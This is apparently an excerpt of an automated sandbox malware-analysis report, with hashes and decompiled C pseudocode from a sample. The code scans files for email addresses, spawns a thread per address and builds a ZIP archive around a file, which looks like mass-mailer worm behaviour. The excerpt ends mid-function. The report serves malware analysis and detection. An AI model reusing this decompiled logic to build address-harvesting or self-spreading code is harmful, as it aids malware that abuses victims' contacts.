                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: rand$CountTicksrand$LocalTime$_itoa
                                                                          • String ID: 1$abcdefghijklmnopqrstuvwxyz
                                                                          • API String ID: 1825045967-2454072292
                                                                          • Opcode ID: 4f87a31ff910bbbb76765ae44f831347ed66564e87c85ef04c6c44d63fd729d0
                                                                          • Instruction ID: 02076846e8c8a6e31432f83e4ba7e8d02048c9f1cba05857c09831ad89ea6e40
                                                                          • Opcode Fuzzy Hash: 4f87a31ff910bbbb76765ae44f831347ed66564e87c85ef04c6c44d63fd729d0
                                                                          • Instruction Fuzzy Hash: 05818271D10255CECB20EFFDC9855AEBBF0EF44304F04827EE884EB686E63859458B99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: rand$CountTicksrand$LocalTime$_itoa
                                                                          • String ID: 1$abcdefghijklmnopqrstuvwxyz
                                                                          • API String ID: 1825045967-2454072292
                                                                          • Opcode ID: d440a931a9828604412f1a6c5e1eba2545ae415163184f67e12b98fea018b4f9
                                                                          • Instruction ID: 08b90c865ba8496aedd198f6e57dbd32cf2abbb3e8829b71b4f22ed4fc9ecb7d
                                                                          • Opcode Fuzzy Hash: d440a931a9828604412f1a6c5e1eba2545ae415163184f67e12b98fea018b4f9
                                                                          • Instruction Fuzzy Hash: 3E71B475D016158EDB12DFBCC8451AEFBF8EF04381F44862AE884EB24AEB34B5558B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E0040307E(signed int __edx, char* _a4) {
                                                                          				void* _v16;
                                                                          				char _v236;
                                                                          				char _v237;
                                                                          				char _v240;
                                                                          				int _v244;
                                                                          				int _v248;
                                                                          				char* _v268;
                                                                          				int _v272;
                                                                          				char* _v276;
                                                                          				intOrPtr _v280;
                                                                          				int _v284;
                                                                          				void* __ebx;
                                                                          				int _t64;
                                                                          				int _t69;
                                                                          				long _t71;
                                                                          				int _t77;
                                                                          				signed int _t80;
                                                                          				signed int _t81;
                                                                          				int _t83;
                                                                          				int _t92;
                                                                          				int _t95;
                                                                          				signed int _t97;
                                                                          				int _t99;
                                                                          				int _t100;
                                                                          				int _t101;
                                                                          				int _t102;
                                                                          				int _t103;
                                                                          				signed int _t104;
                                                                          				signed int _t107;
                                                                          				long _t110;
                                                                          				struct _IO_FILE* _t111;
                                                                          				struct _IO_FILE* _t112;
                                                                          				int* _t113;
                                                                          				intOrPtr* _t114;
                                                                          
                                                                          				_t104 = __edx;
                                                                          				_v244 = 0;
                                                                          				_t110 = 0;
                                                                          				_t111 = fopen(_a4, 0x40efaf);
                                                                          				_t64 = 0;
                                                                          				if(_t111 == 0) {
                                                                          					L50:
                                                                          					return _t64;
                                                                          				}
                                                                          				while(fgetc(_t111) != 0xffffffff) {
                                                                          					_v244 = _v244 + 1;
                                                                          				}
                                                                          				fclose(_t111);
                                                                          				_t112 = fopen(_a4, 0x40efaf);
                                                                          				_t64 = 0;
                                                                          				if(_t112 == 0) {
                                                                          					goto L50;
                                                                          				}
                                                                          				while(1) {
                                                                          					L47:
                                                                          					_t69 = fgetc(_t112);
                                                                          					_t99 = _t69;
                                                                          					if(_t69 == 0xffffffff || _t110 > _v244) {
                                                                          						break;
                                                                          					}
                                                                          					if(_t99 != 0x40) {
                                                                          						continue;
                                                                          					}
                                                                          					_t71 = ftell(_t112);
                                                                          					_t8 = _t71 - 1; // -1
                                                                          					_t110 = _t8;
                                                                          					if(_t110 > 0) {
                                                                          						_t9 = _t71 - 2; // -2
                                                                          						_t110 = _t9;
                                                                          					}
                                                                          					fseek(_t112, _t110, 0);
                                                                          					_t100 = fgetc(_t112);
                                                                          					while(1) {
                                                                          						_t14 = _t100 - 0x61; // -97
                                                                          						_t17 = _t100 - 0x41; // -65
                                                                          						_t104 = _t104 & 0xffffff00 | _t14 - 0x00000019 < 0x00000000 | _t17 & 0xffffff00 | _t17 - 0x00000019 < 0x00000000;
                                                                          						if(_t104 != 0) {
                                                                          							goto L11;
                                                                          						}
                                                                          						L15:
                                                                          						_t20 = _t100 - 0x30; // -48
                                                                          						_t97 = _t20;
                                                                          						if(_t97 <= 9) {
                                                                          							goto L11;
                                                                          						}
                                                                          						_t104 = _t104 & 0xffffff00 | _t100 == 0x0000005f | _t97 & 0xffffff00 | _t100 == 0x0000002d;
                                                                          						if(_t104 == 0 && _t100 != 0x2e) {
                                                                          							L18:
                                                                          							_v248 = 0;
                                                                          							while(1) {
                                                                          								_t77 = fgetc(_t112);
                                                                          								_t101 = _t77;
                                                                          								if(_t77 == 0xffffffff) {
                                                                          									break;
                                                                          								}
                                                                          								_t103 = 0;
                                                                          								_t26 = _t101 - 0x61; // -97
                                                                          								if(_t26 <= 0x19) {
                                                                          									_t103 = 1;
                                                                          								}
                                                                          								_t27 = _t101 - 0x41; // -65
                                                                          								if(_t27 <= 0x19) {
                                                                          									_t103 = 1;
                                                                          								}
                                                                          								_t28 = _t101 - 0x30; // -48
                                                                          								_t80 = _t28;
                                                                          								if(_t80 <= 9) {
                                                                          									_t103 = 1;
                                                                          								}
                                                                          								_t81 = _t80 & 0xffffff00 | _t101 == 0x0000002d;
                                                                          								_t107 = _t104 & 0xffffff00 | _t101 == 0x0000005f | _t81;
                                                                          								if(_t107 != 0) {
                                                                          									_t103 = 1;
                                                                          								}
                                                                          								_t104 = _t107 & 0xffffff00 | _t101 == 0x00000040 | _t81 & 0xffffff00 | _t101 == 0x0000002e;
                                                                          								if(_t104 != 0) {
                                                                          									_t103 = 1;
                                                                          								}
                                                                          								if(_t103 == 0) {
                                                                          									break;
                                                                          								} else {
                                                                          									_t92 = _v248;
                                                                          									 *(_t92 +  &_v236) = _t101;
                                                                          									_v248 = _t92 + 1;
                                                                          									continue;
                                                                          								}
                                                                          							}
                                                                          							_t83 = _v248;
                                                                          							 *((char*)(_t83 +  &_v236)) = 0;
                                                                          							if( *((char*)(_t83 +  &_v237)) == 0x40) {
                                                                          								goto L47;
                                                                          							}
                                                                          							_t102 =  &_v236;
                                                                          							_v284 = _t102;
                                                                          							L0040C310();
                                                                          							_t113 = _t113 - 4;
                                                                          							if(_t83 > 9 &&  *((char*)(_v248 +  &_v237)) != 0x2e && _v236 != 0x40 && _v236 != 0x2e && _v236 != 0x2d) {
                                                                          								 *_t113 = _t102;
                                                                          								if(E00403008() == 0) {
                                                                          									goto L47;
                                                                          								}
                                                                          								 *_t113 = _t102;
                                                                          								if(E00402FC2(_t85, _t102) == 0) {
                                                                          									goto L47;
                                                                          								}
                                                                          								 *_t113 = _t102;
                                                                          								if(E0040305A() == 0) {
                                                                          									goto L47;
                                                                          								}
                                                                          								while(E00404F0A(_t102, _t104) == 0) {
                                                                          									 *_t113 = 0x7530;
                                                                          									Sleep(??);
                                                                          									_t113 = _t113 - 4;
                                                                          								}
                                                                          								_v268 =  &_v240;
                                                                          								_v272 = 0;
                                                                          								_v276 =  &_v236;
                                                                          								_v280 = E00402288;
                                                                          								_v284 = 0;
                                                                          								 *_t113 = 0;
                                                                          								CreateThread(??, ??, ??, ??, ??, ??);
                                                                          								_t114 = _t113 - 0x18;
                                                                          								 *_t114 = 0x28;
                                                                          								Sleep(??);
                                                                          								_t113 = _t114 - 4;
                                                                          								if( *0x414018 == 4) {
                                                                          									 *0x414018 = 0;
                                                                          									 *_t113 = 0xfa0;
                                                                          									Sleep(??);
                                                                          									_t113 = _t113 - 4;
                                                                          								}
                                                                          								 *0x414018 =  *0x414018 + 1;
                                                                          							}
                                                                          							goto L47;
                                                                          						}
                                                                          						L11:
                                                                          						if(_t110 == 0) {
                                                                          							rewind(_t112);
                                                                          							goto L18;
                                                                          						}
                                                                          						_t110 = _t110 - 1;
                                                                          						fseek(_t112, _t110, 0);
                                                                          						_t95 = fgetc(_t112);
                                                                          						_t100 = _t95;
                                                                          						if(_t95 == 0xffffffff) {
                                                                          							fclose(_t112);
                                                                          						}
                                                                          						_t14 = _t100 - 0x61; // -97
                                                                          						_t17 = _t100 - 0x41; // -65
                                                                          						_t104 = _t104 & 0xffffff00 | _t14 - 0x00000019 < 0x00000000 | _t17 & 0xffffff00 | _t17 - 0x00000019 < 0x00000000;
                                                                          						if(_t104 != 0) {
                                                                          							goto L11;
                                                                          						}
                                                                          						goto L15;
                                                                          					}
                                                                          				}
                                                                          				fclose(_t112);
                                                                          				_t64 = 0;
                                                                          				goto L50;
                                                                          			}





































                                                                          0x0040307e
                                                                          0x0040308a
                                                                          0x00403094
                                                                          0x004030ac
                                                                          0x004030ae
                                                                          0x004030b5
                                                                          0x00403388
                                                                          0x0040338f
                                                                          0x0040338f
                                                                          0x004030c3
                                                                          0x004030bd
                                                                          0x004030bd
                                                                          0x004030d3
                                                                          0x004030eb
                                                                          0x004030ed
                                                                          0x004030f4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403360
                                                                          0x00403360
                                                                          0x00403363
                                                                          0x00403368
                                                                          0x0040336d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040310f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403118
                                                                          0x0040311d
                                                                          0x0040311d
                                                                          0x00403122
                                                                          0x00403124
                                                                          0x00403124
                                                                          0x00403124
                                                                          0x00403136
                                                                          0x00403143
                                                                          0x00403177
                                                                          0x00403177
                                                                          0x00403180
                                                                          0x00403189
                                                                          0x0040318b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040318d
                                                                          0x0040318d
                                                                          0x0040318d
                                                                          0x00403193
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004031a1
                                                                          0x004031a3
                                                                          0x004031aa
                                                                          0x004031aa
                                                                          0x00403224
                                                                          0x00403227
                                                                          0x0040322c
                                                                          0x00403231
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004031b6
                                                                          0x004031bb
                                                                          0x004031c1
                                                                          0x004031c3
                                                                          0x004031c3
                                                                          0x004031c8
                                                                          0x004031ce
                                                                          0x004031d0
                                                                          0x004031d0
                                                                          0x004031d5
                                                                          0x004031d5
                                                                          0x004031db
                                                                          0x004031dd
                                                                          0x004031dd
                                                                          0x004031eb
                                                                          0x004031ee
                                                                          0x004031f0
                                                                          0x004031f2
                                                                          0x004031f2
                                                                          0x00403203
                                                                          0x00403205
                                                                          0x00403207
                                                                          0x00403207
                                                                          0x0040320e
                                                                          0x00000000
                                                                          0x00403210
                                                                          0x00403210
                                                                          0x00403216
                                                                          0x0040321e
                                                                          0x00000000
                                                                          0x0040321e
                                                                          0x0040320e
                                                                          0x00403233
                                                                          0x00403239
                                                                          0x00403249
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040324f
                                                                          0x00403255
                                                                          0x00403258
                                                                          0x0040325d
                                                                          0x00403263
                                                                          0x004032a4
                                                                          0x004032ae
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004032b4
                                                                          0x004032be
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004032c4
                                                                          0x004032ce
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004032e5
                                                                          0x004032d6
                                                                          0x004032dd
                                                                          0x004032e2
                                                                          0x004032e2
                                                                          0x004032f4
                                                                          0x004032f8
                                                                          0x00403306
                                                                          0x0040330a
                                                                          0x00403312
                                                                          0x0040331a
                                                                          0x00403321
                                                                          0x00403326
                                                                          0x00403329
                                                                          0x00403330
                                                                          0x00403335
                                                                          0x0040333f
                                                                          0x00403341
                                                                          0x0040334b
                                                                          0x00403352
                                                                          0x00403357
                                                                          0x00403357
                                                                          0x0040335a
                                                                          0x0040335a
                                                                          0x00000000
                                                                          0x00403263
                                                                          0x00403147
                                                                          0x00403149
                                                                          0x00403102
                                                                          0x00000000
                                                                          0x00403102
                                                                          0x0040314b
                                                                          0x0040315b
                                                                          0x00403163
                                                                          0x00403168
                                                                          0x0040316d
                                                                          0x00403172
                                                                          0x00403172
                                                                          0x00403177
                                                                          0x00403180
                                                                          0x00403189
                                                                          0x0040318b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040318b
                                                                          0x00403177
                                                                          0x0040337e
                                                                          0x00403383
                                                                          0x00000000

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Sleepfgetc$fclosefopen$CreateThreadlstrlenrewind
                                                                          • String ID: -$-$-$.$.$@$@$_$_
                                                                          • API String ID: 3748466826-511738659
                                                                          • Opcode ID: e3e62f6e979f6702fd6e717d28f425ea4601e77e36b28012b9f2447554cc7b5d
                                                                          • Instruction ID: 6d437ecd7483d23b259e28590f61e0e5bcbda088feaf823980ac16ccee795e59
                                                                          • Opcode Fuzzy Hash: e3e62f6e979f6702fd6e717d28f425ea4601e77e36b28012b9f2447554cc7b5d
                                                                          • Instruction Fuzzy Hash: 287182748043148AD720AF25C4C536EBFA8AF44715F1549BFE885AB3C1DB7C8B848B8B
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 86%
                                                                          			E0040829C(signed int __edx, CHAR* _a4, CHAR* _a8, void* _a12) {
                                                                          				void* _v16;
                                                                          				short _v32;
                                                                          				short _v34;
                                                                          				long _v38;
                                                                          				long _v42;
                                                                          				intOrPtr _v46;
                                                                          				void* _v48;
                                                                          				signed short _v50;
                                                                          				short _v52;
                                                                          				short _v54;
                                                                          				short _v56;
                                                                          				void _v60;
                                                                          				short _v72;
                                                                          				intOrPtr _v76;
                                                                          				intOrPtr _v80;
                                                                          				short _v82;
                                                                          				short _v84;
                                                                          				short _v86;
                                                                          				short _v88;
                                                                          				char _v92;
                                                                          				struct _OVERLAPPED* _v98;
                                                                          				intOrPtr _v102;
                                                                          				short _v104;
                                                                          				short _v110;
                                                                          				short _v112;
                                                                          				long _v116;
                                                                          				long _v120;
                                                                          				intOrPtr _v124;
                                                                          				short _v126;
                                                                          				short _v128;
                                                                          				short _v130;
                                                                          				short _v132;
                                                                          				short _v134;
                                                                          				short _v136;
                                                                          				void _v140;
                                                                          				char _v1164;
                                                                          				long _v1168;
                                                                          				long _v1172;
                                                                          				void* _v1176;
                                                                          				void* _v1188;
                                                                          				void* _v1192;
                                                                          				void* _v1196;
                                                                          				void* _v1200;
                                                                          				void* _v1204;
                                                                          				void* _v1208;
                                                                          				char _v1212;
                                                                          				struct _OVERLAPPED* _v1216;
                                                                          				void* _v1220;
                                                                          				long _v1224;
                                                                          				void* _v1228;
                                                                          				signed int _t133;
                                                                          				signed int _t137;
                                                                          				int _t140;
                                                                          				int _t141;
                                                                          				intOrPtr _t148;
                                                                          				long _t149;
                                                                          				long _t150;
                                                                          				short _t151;
                                                                          				long _t155;
                                                                          				char _t159;
                                                                          				int _t162;
                                                                          				long _t167;
                                                                          				void* _t171;
                                                                          				intOrPtr _t187;
                                                                          				struct _OVERLAPPED* _t190;
                                                                          				signed int _t197;
                                                                          				signed int _t199;
                                                                          				void* _t204;
                                                                          				void* _t206;
                                                                          				void* _t208;
                                                                          				void* _t210;
                                                                          				void* _t211;
                                                                          				void* _t212;
                                                                          				void* _t213;
                                                                          				void* _t214;
                                                                          				void* _t225;
                                                                          				void* _t226;
                                                                          				intOrPtr* _t230;
                                                                          				void** _t231;
                                                                          
                                                                          				_t197 = __edx;
                                                                          				_t133 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
                                                                          				_t213 = _t212 - 0x1c;
                                                                          				_t211 = _t133;
                                                                          				_t190 = 0;
                                                                          				_t199 = _t197 & 0xffffff00 | _t133 == 0xffffffff | _t133 & 0xffffff00 | _t133 == 0x00000000;
                                                                          				if(_t199 == 0) {
                                                                          					_t137 = CreateFileA(_a8, 0x40000000, 3, 0, 2, 0x80, 0);
                                                                          					_t214 = _t213 - 0x1c;
                                                                          					_v1176 = _t137;
                                                                          					if((_t199 & 0xffffff00 | _t137 == 0xffffffff | _t137 & 0xffffff00 | _t137 == 0x00000000) == 0) {
                                                                          						_t204 =  &_v60;
                                                                          						asm("cld");
                                                                          						_t140 = memset(_t204, 0, 7 << 2);
                                                                          						 *((short*)(_t204 + 7)) = 0;
                                                                          						_t206 =  &_v140;
                                                                          						_t141 = memset(_t206, _t140, 0xb << 2);
                                                                          						 *((short*)(_t206 + 0xb)) = 0;
                                                                          						_t208 =  &_v92;
                                                                          						memset(_t208, _t141, 5 << 2);
                                                                          						 *((short*)(_t208 + 5)) = 0;
                                                                          						_v60 = 0x4034b50;
                                                                          						_v56 = 0xa;
                                                                          						_v134 = 0xa;
                                                                          						_v54 = 0;
                                                                          						_v132 = 0;
                                                                          						_v52 = 0;
                                                                          						_v130 = 0;
                                                                          						E0040814C( &_v50,  &_v48);
                                                                          						_v128 = _v50 & 0x0000ffff;
                                                                          						_v126 = _v48;
                                                                          						_t148 = E004081D8(_t211);
                                                                          						_v46 = _t148;
                                                                          						_v124 = _t148;
                                                                          						_t149 = GetFileSize(_t211, 0);
                                                                          						_v42 = _t149;
                                                                          						_v120 = _t149;
                                                                          						_t150 = GetFileSize(_t211, 0);
                                                                          						_v38 = _t150;
                                                                          						_v116 = _t150;
                                                                          						_t151 = _a12;
                                                                          						_v1212 = _t151;
                                                                          						L0040C310();
                                                                          						_v34 = _t151;
                                                                          						_v112 = _t151;
                                                                          						_v32 = 0;
                                                                          						_v110 = 0;
                                                                          						_v98 = 0;
                                                                          						WriteFile(_v1176,  &_v60, 0x1e,  &_v1168, 0);
                                                                          						_t155 = _a12;
                                                                          						_v1216 = _t155;
                                                                          						L0040C310();
                                                                          						WriteFile(_v1176, _a12, _t155,  &_v1168, 0);
                                                                          						_t159 = _a12;
                                                                          						_v1220 = _t159;
                                                                          						L0040C310();
                                                                          						_t74 = _t159 + 0x1e; // 0x1e
                                                                          						_t187 = _t74;
                                                                          						SetFilePointer(_t211, 0, 0, 0);
                                                                          						_t225 = _t214 + 0x24 - 0xffffffffffffffbc;
                                                                          						_t210 =  &_v1164;
                                                                          						while(1) {
                                                                          							_v1168 = 0;
                                                                          							_t162 = ReadFile(_t211, _t210, 0x400,  &_v1168, 0);
                                                                          							_t226 = _t225 - 0x14;
                                                                          							if(_t162 == 0 || _v1168 == 0) {
                                                                          								break;
                                                                          							}
                                                                          							WriteFile(_v1176, _t210, _v1168,  &_v1172, 0);
                                                                          							_t225 = _t226 - 0x14;
                                                                          							_t187 = _t187 + _v1168;
                                                                          						}
                                                                          						_v76 = _t187;
                                                                          						_v140 = 0x2014b50;
                                                                          						_v136 = 0x14;
                                                                          						_v104 = 0;
                                                                          						_v102 = 0x20;
                                                                          						WriteFile(_v1176,  &_v140, 0x2e,  &_v1168, 0);
                                                                          						_t167 = _a12;
                                                                          						_v1224 = _t167;
                                                                          						L0040C310();
                                                                          						WriteFile(_v1176, _a12, _t167,  &_v1168, 0);
                                                                          						_t171 = _a12;
                                                                          						_v1228 = _t171;
                                                                          						L0040C310();
                                                                          						_t230 = _t226 - 0xfffffffffffffff8;
                                                                          						_v92 = 0x6054b50;
                                                                          						_v88 = 0;
                                                                          						_v86 = 0;
                                                                          						_v84 = 1;
                                                                          						_v82 = 1;
                                                                          						_v80 = _t187 + 0x2e + _t171 - _v76;
                                                                          						_v72 = 0;
                                                                          						_v1216 = 0;
                                                                          						_v1220 =  &_v1168;
                                                                          						_v1224 = 0x16;
                                                                          						_v1228 =  &_v92;
                                                                          						 *_t230 = _v1176;
                                                                          						WriteFile(??, ??, ??, ??, ??);
                                                                          						_t231 = _t230 - 0x14;
                                                                          						 *_t231 = _v1176;
                                                                          						CloseHandle(??);
                                                                          						 *(_t231 - 4) = _t211;
                                                                          						CloseHandle(??);
                                                                          						_t190 = 1;
                                                                          					} else {
                                                                          						CloseHandle(_t211);
                                                                          						_t190 = 0;
                                                                          					}
                                                                          				}
                                                                          				return _t190;
                                                                          			}


















































































                                                                          0x0040829c
                                                                          0x004082de
                                                                          0x004082e3
                                                                          0x004082e6
                                                                          0x004082f3
                                                                          0x004082f8
                                                                          0x004082fa
                                                                          0x00408336
                                                                          0x0040833b
                                                                          0x0040833e
                                                                          0x00408351
                                                                          0x00408368
                                                                          0x0040836b
                                                                          0x00408376
                                                                          0x00408378
                                                                          0x0040837d
                                                                          0x00408388
                                                                          0x0040838a
                                                                          0x0040838f
                                                                          0x00408397
                                                                          0x00408399
                                                                          0x0040839e
                                                                          0x004083a5
                                                                          0x004083ab
                                                                          0x004083b4
                                                                          0x004083ba
                                                                          0x004083c0
                                                                          0x004083c6
                                                                          0x004083dc
                                                                          0x004083e5
                                                                          0x004083ec
                                                                          0x004083f3
                                                                          0x004083f8
                                                                          0x004083fb
                                                                          0x00408409
                                                                          0x00408411
                                                                          0x00408414
                                                                          0x00408422
                                                                          0x0040842a
                                                                          0x0040842d
                                                                          0x00408430
                                                                          0x00408433
                                                                          0x00408436
                                                                          0x0040843e
                                                                          0x00408442
                                                                          0x00408446
                                                                          0x0040844c
                                                                          0x00408452
                                                                          0x00408480
                                                                          0x00408488
                                                                          0x0040848b
                                                                          0x0040848e
                                                                          0x004084bc
                                                                          0x004084c4
                                                                          0x004084c7
                                                                          0x004084ca
                                                                          0x004084d2
                                                                          0x004084d2
                                                                          0x004084f0
                                                                          0x004084f5
                                                                          0x004084f8
                                                                          0x004084fe
                                                                          0x004084fe
                                                                          0x00408529
                                                                          0x0040852e
                                                                          0x00408533
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00408567
                                                                          0x0040856c
                                                                          0x0040856f
                                                                          0x0040856f
                                                                          0x00408577
                                                                          0x0040857a
                                                                          0x00408584
                                                                          0x0040858d
                                                                          0x00408593
                                                                          0x004085c7
                                                                          0x004085d2
                                                                          0x004085d5
                                                                          0x004085d8
                                                                          0x00408606
                                                                          0x0040860e
                                                                          0x00408611
                                                                          0x00408614
                                                                          0x00408619
                                                                          0x0040861e
                                                                          0x00408625
                                                                          0x0040862b
                                                                          0x00408631
                                                                          0x00408637
                                                                          0x00408642
                                                                          0x00408645
                                                                          0x0040864b
                                                                          0x00408659
                                                                          0x0040865d
                                                                          0x00408668
                                                                          0x00408672
                                                                          0x00408675
                                                                          0x0040867a
                                                                          0x00408683
                                                                          0x00408686
                                                                          0x0040868e
                                                                          0x00408691
                                                                          0x00408699
                                                                          0x00408353
                                                                          0x00408356
                                                                          0x0040835e
                                                                          0x0040835e
                                                                          0x00408351
                                                                          0x004086a7

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: File$lstrlen$CreateSizeWrite$CloseHandlePointerRead
                                                                          • String ID: $.
                                                                          • API String ID: 2059494333-3929174939
                                                                          • Opcode ID: 555209977dd7f61af360ae51e36ae12b9c11cae2c95c9b266d9ad5083ad1dd06
                                                                          • Instruction ID: 330a0651d7a757380811ed2d4a39bd4f834bab233f08717d63250c6a01a72e4e
                                                                          • Opcode Fuzzy Hash: 555209977dd7f61af360ae51e36ae12b9c11cae2c95c9b266d9ad5083ad1dd06
                                                                          • Instruction Fuzzy Hash: 17B1DDB4804304DBDB10EF65C59579EBBF4BF44304F00896EE898A7391E7799648CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 65%
                                                                          			E1000157E(signed int __edx, int _a4) {
                                                                          				void* _v16;
                                                                          				char _v300;
                                                                          				char _v572;
                                                                          				char _v1596;
                                                                          				short _v1628;
                                                                          				intOrPtr _v1632;
                                                                          				long _v1648;
                                                                          				long _v1652;
                                                                          				CHAR* _v1656;
                                                                          				CHAR* _v1660;
                                                                          				char _v1676;
                                                                          				struct _PROCESS_INFORMATION _v1692;
                                                                          				char _v1696;
                                                                          				void* _v1728;
                                                                          				void* _v1732;
                                                                          				void* _v1736;
                                                                          				void* _v1740;
                                                                          				CHAR* _v1744;
                                                                          				intOrPtr _v1748;
                                                                          				CHAR* _v1752;
                                                                          				CHAR* _v1756;
                                                                          				char* _v1760;
                                                                          				CHAR* _v1764;
                                                                          				CHAR* _v1768;
                                                                          				signed int _t64;
                                                                          				CHAR* _t67;
                                                                          				int _t73;
                                                                          				int _t74;
                                                                          				CHAR* _t86;
                                                                          				CHAR* _t87;
                                                                          				CHAR* _t88;
                                                                          				signed int _t89;
                                                                          				CHAR* _t91;
                                                                          				CHAR* _t92;
                                                                          				CHAR* _t93;
                                                                          				struct _STARTUPINFOA* _t94;
                                                                          				void* _t95;
                                                                          				void* _t99;
                                                                          				CHAR** _t100;
                                                                          				CHAR** _t101;
                                                                          
                                                                          				_t89 = __edx;
                                                                          				_t86 =  &_v300;
                                                                          				GetTempPathA(0x104, _t86);
                                                                          				_t93 =  &_v572;
                                                                          				GetTempFileNameA(_t86, 0x10005000, 0, _t93);
                                                                          				_t64 = CreateFileA(_t93, 0x40000000, 1, 0, 2, 0x80, 0);
                                                                          				_t99 = _t95 - 0x698;
                                                                          				_t92 = _t64;
                                                                          				if(((_t64 & 0xffffff00 | _t64 == 0xffffffff | _t89 & 0xffffff00 | _t64 == 0x00000000) & 0x00000001) == 0) {
